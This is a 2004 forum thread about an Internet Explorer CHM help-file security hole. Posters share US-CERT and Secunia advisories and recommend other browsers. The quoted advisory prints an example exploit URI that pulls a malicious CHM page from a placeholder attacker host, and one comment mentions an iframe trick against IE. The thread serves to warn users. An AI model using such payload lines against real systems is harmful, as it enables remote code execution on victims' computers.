US-CERT Vulnerability Note VU#323070 (Internet Explorer Security Hole)

CERT ^ | 04/05/2004 | Art Manion

[Salo]

Beware.

[Salo]

Pinging the Penguin Pinger and other interested parties.

[Support Free Republic]

Donate Here By Secure Server

[CDHart]

Can you or someone please translate this for me?

Carolyn

[lilylangtree]

Thank you.

[sigSEGV]

One of many. Not sure if its going to be fixed by the patches out next Tuesday or not. Microsoft won't say. Another fun one is embedding < iframe src="?" > in html (minus the spaces on the ends).

[sigSEGV]

Translation: IE is very broke and Microsoft doesn't have any fixes yet. Your PC could be hijacked or erased by any web page that puts exploit code in it. Use another browser like Mozilla, Firefox, or Opera.

[TechJunkYard]

Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.

[Salo]

This is the secunia advisory for the same problem:

Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07

http://secunia.com/advisories/10523/

Critical:
Highly critical
Impact: Security Bypass

Where: From remote

Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6

Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.

Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.

Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.

However, there exists two problems within the handling of "CHM" files:

1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.

This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.

2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.

Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"

The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.

Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.

Use another product.

Provided and/or discovered by:
Originally reported by Arman Nayyeri.

Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.

Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/

US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070

[rdb3]

The Penguin Ping.

Wanna be Penguified? Just holla!

Got root?

[zeugma]

This bears repeating:

Use a different web browser

There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs. Systems Affected Vendor Status Date Updated Microsoft Corporation Vulnerable 5-Apr-2004 References

[PAR35]

This bears repeating:

Use a different web browser

In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.

[amigatec]

This bears repeating:

Use a different web browser

Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

[ninenot]

Earlier, when I first opened this thread, my Norton interecpted Bloodhound Exploit.6 and ID'd the sender as ...."Temorary Internet Files\Content\.IE5FAQN5\Posts[3]"

You dont' think you're sending this, do you?

[CDHart]

Thank you!

Carolyn

[zeugma]

Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)

[AFreeBird]

Surprise, Surprise, Surprise...

[AFreeBird]

Not ONLY use a different browser, but go into the Internet security settings in Internet Options, and disable or change to "prompt" ALL ActiveX settings.

[CyberCowboy777]

Now that is a ironic pic!

I am no penguin hater (run Fedora at home alongside my XP box and I use Linux for firewall/router functions for some clients) but the penguin don't play.

A couple mainstream (DX games) like Unreal? America's Army? Is Doom 3 going to have a Linux ver?

I am working toward some business application and simple workstation uses of Linux - but a 'frag' o/s it is not (yet anyway).

[CyberCowboy777]

I personally cannot stand my browser and email mixed so I run Firefox at home, but still is not in a place for me to install it on my clients systems.

You must remember that many of the exploits of IE are because of the features of IE. Feature we use everyday that seem simple but when you are use to them it is hard to do without.

I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)